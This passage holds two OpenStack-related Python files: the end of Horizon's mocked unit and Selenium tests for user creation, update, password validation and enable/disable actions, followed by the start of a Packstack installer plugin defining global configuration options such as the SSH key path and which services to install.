self.mock_tenant_list, 2,
mock.call(test.IsHttpRequest(), user=None))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_role_list, 2,
mock.call(test.IsHttpRequest()))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_default_role, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({api.keystone: ('get_default_domain',
'tenant_list',
'role_list',
'get_default_role')})
def test_create_validation_for_password_too_long(self):
user = self.users.get(id="1")
domain = self._get_default_domain()
domain_id = domain.id
self.mock_get_default_domain.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_role_list.return_value = self.roles.list()
self.mock_get_default_role.return_value = self.roles.first()
# check password min-len verification
formData = {'method': 'CreateUserForm',
'domain_id': domain_id,
'name': user.name,
'email': user.email,
'password': 'MoreThanEighteenChars',
'project': self.tenant.id,
'role_id': self.roles.first().id,
'confirm_password': 'MoreThanEighteenChars'}
res = self.client.post(USER_CREATE_URL, formData)
self.assertFormError(
res, "form", 'password',
['Password must be between 8 and 18 characters.'])
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_default_domain, 2,
mock.call(test.IsHttpRequest()))
if api.keystone.VERSIONS.active >= 3:
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_tenant_list, 2,
mock.call(test.IsHttpRequest(), domain=domain_id))
else:
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_tenant_list, 2,
mock.call(test.IsHttpRequest(), user=None))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_role_list, 2,
mock.call(test.IsHttpRequest()))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_default_role, 2,
mock.call(test.IsHttpRequest()))
@override_settings(USER_TABLE_EXTRA_INFO={'phone_num': 'Phone Number'})
@test.create_mocks({api.keystone: ('user_get',
'domain_get',
'tenant_list',
'user_update',)})
def test_update(self):
user = self.users.get(id="1")
domain_id = user.domain_id
domain = self.domains.get(id=domain_id)
phone_number = "+81-3-1234-5678"
self.mock_user_get.return_value = user
self.mock_domain_get.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_user_update.return_value = None
formData = {'method': 'UpdateUserForm',
'id': user.id,
'name': user.name,
'description': user.description,
'email': user.email,
'project': self.tenant.id,
'phone_num': phone_number}
res = self.client.post(USER_UPDATE_URL, formData)
self.assertNoFormErrors(res)
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=True)
self.mock_domain_get.assert_called_once_with(test.IsHttpRequest(),
domain_id)
if api.keystone.VERSIONS.active >= 3:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain.id)
else:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), user=user.id)
kwargs = {'phone_num': phone_number}
self.mock_user_update.assert_called_once_with(test.IsHttpRequest(),
user.id,
email=user.email,
name=user.name,
**kwargs)
@test.create_mocks({api.keystone: ('user_get',
'domain_get',
'tenant_list',
'user_update',)})
def test_update_default_project(self):
user = self.users.get(id="1")
domain_id = user.domain_id
domain = self.domains.get(id=domain_id)
new_project_id = self.tenants.get(id="3").id
self.mock_user_get.return_value = user
self.mock_domain_get.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_user_update.return_value = None
formData = {'method': 'UpdateUserForm',
'id': user.id,
'name': user.name,
'description': user.description,
'email': user.email,
'project': new_project_id}
res = self.client.post(USER_UPDATE_URL, formData)
self.assertNoFormErrors(res)
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=True)
self.mock_domain_get.assert_called_once_with(test.IsHttpRequest(),
domain_id)
if api.keystone.VERSIONS.active >= 3:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain.id)
else:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), user=user.id)
self.mock_user_update.assert_called_once_with(test.IsHttpRequest(),
user.id,
email=user.email,
name=user.name,
project=new_project_id)
@test.create_mocks({api.keystone: ('user_get',
'domain_get',
'tenant_list',
'user_update',)})
def test_update_with_no_email_attribute(self):
user = self.users.get(id="5")
domain_id = user.domain_id
domain = self.domains.get(id=domain_id)
self.mock_user_get.return_value = user
self.mock_domain_get.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_user_update.return_value = None
formData = {'method': 'UpdateUserForm',
'id': user.id,
'name': user.name,
'description': user.description,
'email': "",
'project': self.tenant.id}
res = self.client.post(USER_UPDATE_URL, formData)
self.assertNoFormErrors(res)
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=True)
self.mock_domain_get.assert_called_once_with(test.IsHttpRequest(),
domain_id)
if api.keystone.VERSIONS.active >= 3:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain.id)
else:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), user=user.id)
self.mock_user_update.assert_called_once_with(test.IsHttpRequest(),
user.id,
email=user.email or "",
name=user.name,
project=self.tenant.id)
@test.create_mocks({api.keystone: ('user_get',
'domain_get',
'tenant_list',
'keystone_can_edit_user', )})
def test_update_with_keystone_can_edit_user_false(self):
user = self.users.get(id="1")
domain_id = user.domain_id
domain = self.domains.get(id=domain_id)
self.mock_user_get.return_value = user
self.mock_domain_get.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_keystone_can_edit_user.return_value = False
formData = {'method': 'UpdateUserForm',
'id': user.id,
'name': user.name,
'project': self.tenant.id, }
res = self.client.post(USER_UPDATE_URL, formData)
self.assertNoFormErrors(res)
self.assertMessageCount(error=1)
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=True)
self.mock_domain_get.assert_called_once_with(test.IsHttpRequest(),
domain_id)
if api.keystone.VERSIONS.active >= 3:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain.id)
else:
self.mock_tenant_list.assert_called_once_with(
test.IsHttpRequest(), user=user.id)
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_keystone_can_edit_user, 2,
mock.call())
@test.create_mocks({api.keystone: ('user_get',
'user_update_password')})
def test_change_password(self):
user = self.users.get(id="5")
test_password = 'normalpwd'
self.mock_user_get.return_value = user
self.mock_user_update_password.return_value = None
formData = {'method': 'ChangePasswordForm',
'id': user.id,
'name': user.name,
'password': test_password,
'confirm_password': test_password}
res = self.client.post(USER_CHANGE_PASSWORD_URL, formData)
self.assertNoFormErrors(res)
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=False)
self.mock_user_update_password.assert_called_once_with(
test.IsHttpRequest(), user.id, test_password, admin=False)
@test.create_mocks({api.keystone: ('user_get',
'user_verify_admin_password')})
@override_settings(ENFORCE_PASSWORD_CHECK=True)
def test_change_password_validation_for_admin_password(self):
user = self.users.get(id="1")
test_password = 'normalpwd'
admin_password = 'secret'
self.mock_user_get.return_value = user
self.mock_user_verify_admin_password.return_value = None
formData = {'method': 'ChangePasswordForm',
'id': user.id,
'name': user.name,
'password': test_password,
'confirm_password': test_password,
'admin_password': admin_password}
res = self.client.post(USER_CHANGE_PASSWORD_URL, formData)
self.assertFormError(res, "form", None,
['The admin password is incorrect.'])
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=False)
self.mock_user_verify_admin_password.assert_called_once_with(
test.IsHttpRequest(), admin_password)
@test.create_mocks({api.keystone: ('user_get',)})
def test_update_validation_for_password_too_short(self):
user = self.users.get(id="1")
self.mock_user_get.return_value = user
formData = {'method': 'ChangePasswordForm',
'id': user.id,
'name': user.name,
'password': 't',
'confirm_password': 't'}
res = self.client.post(USER_CHANGE_PASSWORD_URL, formData)
self.assertFormError(
res, "form", 'password',
['Password must be between 8 and 18 characters.'])
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=False)
@test.create_mocks({api.keystone: ('user_get',)})
def test_update_validation_for_password_too_long(self):
user = self.users.get(id="1")
self.mock_user_get.return_value = user
formData = {'method': 'ChangePasswordForm',
'id': user.id,
'name': user.name,
'password': 'ThisIsASuperLongPassword',
'confirm_password': 'ThisIsASuperLongPassword'}
res = self.client.post(USER_CHANGE_PASSWORD_URL, formData)
self.assertFormError(
res, "form", 'password',
['Password must be between 8 and 18 characters.'])
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=False)
@test.create_mocks({api.keystone: ('get_effective_domain_id',
'user_update_enabled',
'user_list',
'domain_lookup')})
def test_enable_user(self):
domain = self._get_default_domain()
domain_id = domain.id
filters = {}
user = self.users.get(id="2")
users = self._get_users(domain_id)
user.enabled = False
self.mock_get_effective_domain_id.return_value = None
self.mock_user_list.return_value = users
self.mock_user_update_enabled.return_value = user
self.mock_domain_lookup.return_value = {domain.id: domain.name}
formData = {'action': 'users__toggle__%s' % user.id}
res = self.client.post(USERS_INDEX_URL, formData)
self.assertRedirectsNoFollow(res, USERS_INDEX_URL)
self.mock_get_effective_domain_id.assert_called_once_with(
test.IsHttpRequest())
self.mock_user_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain_id, filters=filters)
self.mock_user_update_enabled.assert_called_once_with(
test.IsHttpRequest(), user.id, True)
self.mock_domain_lookup.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({api.keystone: ('get_effective_domain_id',
'user_update_enabled',
'user_list',
'domain_lookup')})
def test_disable_user(self):
domain = self._get_default_domain()
domain_id = domain.id
filters = {}
user = self.users.get(id="2")
users = self._get_users(domain_id)
self.assertTrue(user.enabled)
self.mock_get_effective_domain_id.return_value = None
self.mock_user_list.return_value = users
self.mock_user_update_enabled.return_value = user
self.mock_domain_lookup.return_value = {domain.id: domain.name}
formData = {'action': 'users__toggle__%s' % user.id}
res = self.client.post(USERS_INDEX_URL, formData)
self.assertRedirectsNoFollow(res, USERS_INDEX_URL)
self.mock_get_effective_domain_id.assert_called_once_with(
test.IsHttpRequest())
self.mock_user_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain_id, filters=filters)
self.mock_user_update_enabled.assert_called_once_with(
test.IsHttpRequest(), user.id, False)
self.mock_domain_lookup.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({api.keystone: ('get_effective_domain_id',
'user_update_enabled',
'user_list',
'domain_lookup')})
def test_enable_disable_user_exception(self):
domain = self._get_default_domain()
domain_id = domain.id
filters = {}
user = self.users.get(id="2")
users = self._get_users(domain_id)
user.enabled = False
self.mock_get_effective_domain_id.return_value = None
self.mock_user_list.return_value = users
self.mock_user_update_enabled.side_effect = self.exceptions.keystone
self.mock_domain_lookup.return_value = {domain.id: domain.name}
formData = {'action': 'users__toggle__%s' % user.id}
res = self.client.post(USERS_INDEX_URL, formData)
self.assertRedirectsNoFollow(res, USERS_INDEX_URL)
self.mock_get_effective_domain_id.assert_called_once_with(
test.IsHttpRequest())
self.mock_user_list.assert_called_once_with(
test.IsHttpRequest(), domain=domain_id, filters=filters)
self.mock_user_update_enabled.assert_called_once_with(
test.IsHttpRequest(), user.id, True)
self.mock_domain_lookup.assert_called_once_with(test.IsHttpRequest())
@test.create_mocks({api.keystone: ('get_effective_domain_id',
'user_list',
'domain_lookup')})
def test_disabling_current_user(self):
domain = self._get_default_domain()
domain_id = domain.id
filters = {}
users = self._get_users(domain_id)
self.mock_get_effective_domain_id.return_value = None
self.mock_user_list.return_value = users
self.mock_domain_lookup.return_value = {domain.id: domain.name}
formData = {'action': 'users__toggle__%s' % self.request.user.id}
res = self.client.post(USERS_INDEX_URL, formData, follow=True)
self.assertEqual(list(res.context['messages'])[0].message,
u'You are not allowed to disable user: '
u'test_user')
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_effective_domain_id, 2,
mock.call(test.IsHttpRequest()))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_user_list, 2,
mock.call(test.IsHttpRequest(), domain=domain_id, filters=filters))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_domain_lookup, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({api.keystone: ('get_effective_domain_id',
'user_list',
'domain_lookup')})
def test_disabling_current_user_domain_name(self):
domain = self._get_default_domain()
domains = self.domains.list()
filters = {}
domain_id = domain.id
users = self._get_users(domain_id)
domain_lookup = dict((d.id, d.name) for d in domains)
self.mock_get_effective_domain_id.return_value = None
for u in users:
u.domain_name = domain_lookup.get(u.domain_id)
self.mock_domain_lookup.return_value = domain_lookup
self.mock_user_list.return_value = users
formData = {'action': 'users__toggle__%s' % self.request.user.id}
res = self.client.post(USERS_INDEX_URL, formData, follow=True)
self.assertEqual(list(res.context['messages'])[0].message,
u'You are not allowed to disable user: '
u'test_user')
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_effective_domain_id, 2,
mock.call(test.IsHttpRequest()))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_domain_lookup, 2,
mock.call(test.IsHttpRequest()))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_user_list, 2,
mock.call(test.IsHttpRequest(), domain=domain_id, filters=filters))
@test.create_mocks({api.keystone: ('get_effective_domain_id',
'user_list',
'domain_lookup')})
def test_delete_user_with_improper_permissions(self):
domain = self._get_default_domain()
domain_id = domain.id
filters = {}
users = self._get_users(domain_id)
self.mock_get_effective_domain_id.return_value = None
self.mock_user_list.return_value = users
self.mock_domain_lookup.return_value = {domain.id: domain.name}
formData = {'action': 'users__delete__%s' % self.request.user.id}
res = self.client.post(USERS_INDEX_URL, formData, follow=True)
self.assertEqual(list(res.context['messages'])[0].message,
u'You are not allowed to delete user: %s'
% self.request.user.username)
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_effective_domain_id, 2,
mock.call(test.IsHttpRequest()))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_user_list, 2,
mock.call(test.IsHttpRequest(), domain=domain_id, filters=filters))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_domain_lookup, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({api.keystone: ('get_effective_domain_id',
'user_list',
'domain_lookup')})
def test_delete_user_with_improper_permissions_domain_name(self):
domain = self._get_default_domain()
domains = self.domains.list()
domain_id = domain.id
filters = {}
users = self._get_users(domain_id)
domain_lookup = dict((d.id, d.name) for d in domains)
self.mock_get_effective_domain_id.return_value = None
for u in users:
u.domain_name = domain_lookup.get(u.domain_id)
self.mock_user_list.return_value = users
self.mock_domain_lookup.return_value = domain_lookup
formData = {'action': 'users__delete__%s' % self.request.user.id}
res = self.client.post(USERS_INDEX_URL, formData, follow=True)
self.assertEqual(list(res.context['messages'])[0].message,
u'You are not allowed to delete user: %s'
% self.request.user.username)
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_get_effective_domain_id, 2,
mock.call(test.IsHttpRequest()))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_user_list, 2,
mock.call(test.IsHttpRequest(), domain=domain_id, filters=filters))
self.assert_mock_multiple_calls_with_same_arguments(
self.mock_domain_lookup, 2,
mock.call(test.IsHttpRequest()))
@test.create_mocks({api.keystone: ('domain_get',
'user_get',
'tenant_get')})
def test_detail_view(self):
domain = self._get_default_domain()
user = self.users.get(id="1")
tenant = self.tenants.get(id=user.project_id)
self.mock_domain_get.return_value = domain
self.mock_user_get.return_value = user
self.mock_tenant_get.return_value = tenant
res = self.client.get(USER_DETAIL_URL, args=[user.id])
# The first tab is overview, it is the one loaded without query param
# in the url.
self.assertTemplateUsed(res, 'identity/users/_detail_overview.html')
self.assertEqual(res.context['user'].name, user.name)
self.assertEqual(res.context['user'].id, user.id)
self.assertEqual(res.context['tenant_name'], tenant.name)
self.mock_domain_get.assert_called_once_with(test.IsHttpRequest(), '1')
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=False)
self.mock_tenant_get.assert_called_once_with(test.IsHttpRequest(),
user.project_id)
@test.create_mocks({api.keystone: ('user_get',)})
def test_detail_view_with_exception(self):
user = self.users.get(id="1")
self.mock_user_get.side_effect = self.exceptions.keystone
res = self.client.get(USER_DETAIL_URL, args=[user.id])
self.assertRedirectsNoFollow(res, USERS_INDEX_URL)
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=False)
@test.create_mocks({api.keystone: ('domain_get',
'user_get',
'tenant_get')})
def test_detail_view_overview_tab(self):
"""Test the overview tab of the detail view .
Test the overview tab using directly the url targeting the tab.
"""
domain = self._get_default_domain()
user = self.users.get(id="1")
tenant = self.tenants.get(id=user.project_id)
self.mock_domain_get.return_value = domain
self.mock_user_get.return_value = user
self.mock_tenant_get.return_value = tenant
# Url of the overview tab of the detail view
url = USER_DETAIL_URL % [user.id]
detail_view = tabs.UserDetailTabs(self.request, user=user)
overview_tab_link = "?%s=%s" % (
detail_view.param_name,
detail_view.get_tab("overview").get_id()
)
url += overview_tab_link
res = self.client.get(url)
self.assertTemplateUsed(res, 'identity/users/_detail_overview.html')
self.assertEqual(res.context['user'].name, user.name)
self.assertEqual(res.context['user'].id, user.id)
self.assertEqual(res.context['tenant_name'], tenant.name)
self.mock_domain_get.assert_called_once_with(test.IsHttpRequest(), '1')
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=False)
self.mock_tenant_get.assert_called_once_with(test.IsHttpRequest(),
user.project_id)
@test.create_mocks({api.keystone: ('user_get',
'domain_get',
'tenant_list',)})
def test_get_update_form_init_values(self):
user = self.users.get(id="1")
domain_id = user.domain_id
domain = self.domains.get(id=domain_id)
self.mock_user_get.return_value = user
self.mock_domain_get.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
res = self.client.get(USER_UPDATE_URL)
# Check that the form contains the default values as initialized by
# the UpdateView
self.assertEqual(res.context['form']['name'].value(), user.name)
self.assertEqual(res.context['form']['email'].value(), user.email)
self.assertEqual(res.context['form']['description'].value(),
user.description)
self.assertEqual(res.context['form']['project'].value(),
user.project_id)
self.assertEqual(res.context['form']['domain_id'].value(),
user.domain_id)
self.assertEqual(res.context['form']['domain_name'].value(),
domain.name)
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=True)
self.mock_domain_get.assert_called_once_with(test.IsHttpRequest(),
domain_id)
self.mock_tenant_list.assert_called_once_with(test.IsHttpRequest(),
domain=domain_id)
@test.create_mocks({api.keystone: ('user_get',
'domain_get',
'tenant_list',
'user_update',)})
def test_update_different_description(self):
user = self.users.get(id="1")
domain_id = user.domain_id
domain = self.domains.get(id=domain_id)
self.mock_user_get.return_value = user
self.mock_domain_get.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_user_update.return_value = None
formData = {'method': 'UpdateUserForm',
'id': user.id,
'name': user.name,
'description': 'changed',
'email': user.email,
'project': self.tenant.id}
res = self.client.post(USER_UPDATE_URL, formData)
self.assertNoFormErrors(res)
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=True)
self.mock_domain_get.assert_called_once_with(test.IsHttpRequest(),
domain_id)
if api.keystone.VERSIONS.active >= 3:
self.mock_tenant_list.assert_called_once_with(test.IsHttpRequest(),
domain=domain.id)
else:
self.mock_tenant_list.assert_called_once_with(test.IsHttpRequest(),
user=user.id)
self.mock_user_update.assert_called_once_with(test.IsHttpRequest(),
user.id,
email=user.email,
name=user.name,
description='changed')
@test.update_settings(FILTER_DATA_FIRST={'identity.users': True})
def test_index_with_filter_first(self):
res = self.client.get(USERS_INDEX_URL)
self.assertTemplateUsed(res, 'identity/users/index.html')
users = res.context['table'].data
self.assertItemsEqual(users, [])
class SeleniumTests(test.SeleniumAdminTestCase):
def _get_default_domain(self):
domain = {"id": None, "name": None}
return api.base.APIDictWrapper(domain)
@test.create_mocks({api.keystone: ('get_default_domain',
'tenant_list',
'get_default_role',
'role_list',
'user_list',
'domain_lookup')})
def test_modal_create_user_with_passwords_not_matching(self):
domain = self._get_default_domain()
self.mock_get_default_domain.return_value = domain
self.mock_tenant_list.return_value = [self.tenants.list(), False]
self.mock_role_list.return_value = self.roles.list()
self.mock_user_list.return_value = self.users.list()
self.mock_domain_lookup.return_value = {None: None}
self.mock_get_default_role.return_value = self.roles.first()
self.selenium.get("%s%s" % (self.live_server_url, USERS_INDEX_URL))
# Open the modal menu
self.selenium.find_element_by_id("users__action_create").click()
wait = self.ui.WebDriverWait(self.selenium, 10,
ignored_exceptions=[socket_timeout])
wait.until(lambda x: self.selenium.find_element_by_id("id_name"))
self.assertFalse(self._is_element_present("id_confirm_password_error"),
"Password error element shouldn't yet exist.")
self.selenium.find_element_by_id("id_name").send_keys("Test User")
self.selenium.find_element_by_id("id_password").send_keys("test")
self.selenium.find_element_by_id("id_confirm_password").send_keys("te")
self.selenium.find_element_by_id("id_email").send_keys("[email protected]")
wait.until(lambda x: self.selenium.find_element_by_id(
"id_confirm_password_error"))
self.assertTrue(self._is_element_present("id_confirm_password_error"),
"Couldn't find password error element.")
self.assertEqual(2, self.mock_get_default_domain.call_count)
self.mock_get_default_domain.assert_has_calls([
mock.call(test.IsHttpRequest()),
mock.call(test.IsHttpRequest()),
])
self.mock_tenant_list.assert_called_once_with(test.IsHttpRequest(),
domain=None)
self.mock_role_list.assert_called_once_with(test.IsHttpRequest())
self.mock_user_list.assert_called_once_with(test.IsHttpRequest(),
domain=None, filters={})
self.mock_domain_lookup.assert_called_once_with(test.IsHttpRequest())
self.mock_get_default_role.assert_called_once_with(
test.IsHttpRequest())
@test.create_mocks({api.keystone: ('user_get',)})
def test_update_user_with_passwords_not_matching(self):
self.mock_user_get.return_value = self.user
self.selenium.get("%s%s" % (self.live_server_url,
USER_CHANGE_PASSWORD_URL))
self.assertFalse(self._is_element_present("id_confirm_password_error"),
"Password error element shouldn't yet exist.")
self.selenium.find_element_by_id("id_password").send_keys("test")
self.selenium.find_element_by_id("id_confirm_password").send_keys("te")
self.selenium.find_element_by_id("id_name").click()
self.assertTrue(self._is_element_present("id_confirm_password_error"),
"Couldn't find password error element.")
self.mock_user_get.assert_called_once_with(test.IsHttpRequest(), '1',
admin=False)
def _is_element_present(self, element_id):
try:
self.selenium.find_element_by_id(element_id)
return True
except Exception:
return False
|
|
"""
Plugin responsible for setting OpenStack global options
"""
import glob
import logging
import os
import re
import uuid
from packstack.installer import (basedefs, exceptions, processors, utils,
validators)
from packstack.modules.common import filtered_hosts
from packstack.modules.ospluginutils import (getManifestTemplate,
appendManifestFile)
# Controller object will be initialized from main flow
controller = None
# Plugin name
PLUGIN_NAME = "OS-PRESCRIPT"
logging.debug("plugin %s loaded", __name__)
def initConfig(controllerObject):
global controller
controller = controllerObject
paramsList = [{"CMD_OPTION" : "ssh-public-key",
"USAGE" : "Path to a Public key to install on servers. If a usable key has not been installed on the remote servers the user will be prompted for a password and this key will be installed so the password will not be required again",
"PROMPT" : "Enter the path to your ssh Public key to install on servers",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_file,
validators.validate_sshkey],
"PROCESSORS" : [processors.process_ssh_key],
"DEFAULT_VALUE" : (glob.glob(os.path.join(os.environ["HOME"], ".ssh/*.pub"))+[""])[0],
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_SSH_KEY",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-mysql-install",
"USAGE" : "Set to 'y' if you would like Packstack to install MySQL",
"PROMPT" : "Should Packstack install MySQL DB",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_MYSQL_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-glance-install",
"USAGE" : "Set to 'y' if you would like Packstack to install OpenStack Image Service (Glance)",
"PROMPT" : "Should Packstack install OpenStack Image Service (Glance)",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_GLANCE_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-cinder-install",
"USAGE" : "Set to 'y' if you would like Packstack to install OpenStack Block Storage (Cinder)",
"PROMPT" : "Should Packstack install OpenStack Block Storage (Cinder) service",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_CINDER_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-nova-install",
"USAGE" : "Set to 'y' if you would like Packstack to install OpenStack Compute (Nova)",
"PROMPT" : "Should Packstack install OpenStack Compute (Nova) service",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NOVA_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-neutron-install",
"USAGE" : "Set to 'y' if you would like Packstack to install OpenStack Networking (Neutron)",
"PROMPT" : "Should Packstack install OpenStack Networking (Neutron) service",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NEUTRON_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-horizon-install",
"USAGE" : "Set to 'y' if you would like Packstack to install OpenStack Dashboard (Horizon)",
"PROMPT" : "Should Packstack install OpenStack Dashboard (Horizon)",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_HORIZON_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-swift-install",
"USAGE" : "Set to 'y' if you would like Packstack to install OpenStack Object Storage (Swift)",
"PROMPT" : "Should Packstack install OpenStack Object Storage (Swift)",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "n",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_SWIFT_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-ceilometer-install",
"USAGE" : "Set to 'y' if you would like Packstack to install OpenStack Metering (Ceilometer)",
"PROMPT" : "Should Packstack install OpenStack Metering (Ceilometer)",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_CEILOMETER_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-heat-install",
"USAGE" : "Set to 'y' if you would like Packstack to install OpenStack Orchestration (Heat)",
"PROMPT" : "Should Packstack install OpenStack Orchestration (Heat)",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "n",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_HEAT_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-client-install",
"USAGE" : "Set to 'y' if you would like Packstack to install the OpenStack Client packages. An admin \"rc\" file will also be installed",
"PROMPT" : "Should Packstack install OpenStack client tools",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "y",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_CLIENT_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "ntp-servers",
"USAGE" : "Comma separated list of NTP servers. Leave plain if Packstack should not install ntpd on instances.",
"PROMPT" : "Enter a comma separated list of NTP server(s). Leave plain if Packstack should not install ntpd on instances.",
"OPTION_LIST" : [],
"DEFAULT_VALUE" : '',
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NTP_SERVERS",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "nagios-install",
"USAGE" : "Set to 'y' if you would like Packstack to install Nagios to monitor OpenStack hosts",
"PROMPT" : "Should Packstack install Nagios to monitor OpenStack hosts",
"OPTION_LIST" : ["y", "n"],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : 'n',
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_NAGIOS_INSTALL",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "exclude-servers",
"USAGE" : "Comma separated list of servers to be excluded from installation in case you are running Packstack the second time with the same answer file and don't want Packstack to touch these servers. Leave plain if you don't need to exclude any server.",
"PROMPT" : "Enter a comma separated list of server(s) to be excluded. Leave plain if you don't need to exclude any server.",
"OPTION_LIST" : [],
"DEFAULT_VALUE" : '',
"MASK_INPUT" : False,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "EXCLUDE_SERVERS",
